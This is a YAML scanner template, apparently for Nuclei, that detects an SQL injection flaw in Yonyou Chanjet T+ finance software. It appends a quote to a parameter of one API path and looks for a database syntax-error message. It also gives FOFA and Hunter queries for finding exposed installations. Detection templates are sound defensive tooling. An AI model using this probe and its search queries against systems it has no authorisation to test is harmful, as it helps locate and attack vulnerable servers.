http:
    - matchers:
        - part: body
          type: word
          words:
            - 附近有语法错误
      method: GET
      path:
        - '{{RootURL}}/tplus/tapi/v1/DevVouMsgSetApi/getSendActionByMenu?dsName=UFTData160658_000001&menuCode=ARAP01'''
id: yonyou-chanjet-tplus-getsendactionbymenu-sqli
info:
    author: hufei
    description: |
        There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
    metadata:
        fofa-query: app="畅捷通-TPlus"
        hunter-query: app.name="畅捷通 T+"
        max-request: 1
        verified: true
    name: yonyou-chanjettplus - SQL Injection
    reference: None
    severity: high
    tags:
        - chanjet
        - yonyou
        - Python
        - 畅捷通-TPlus
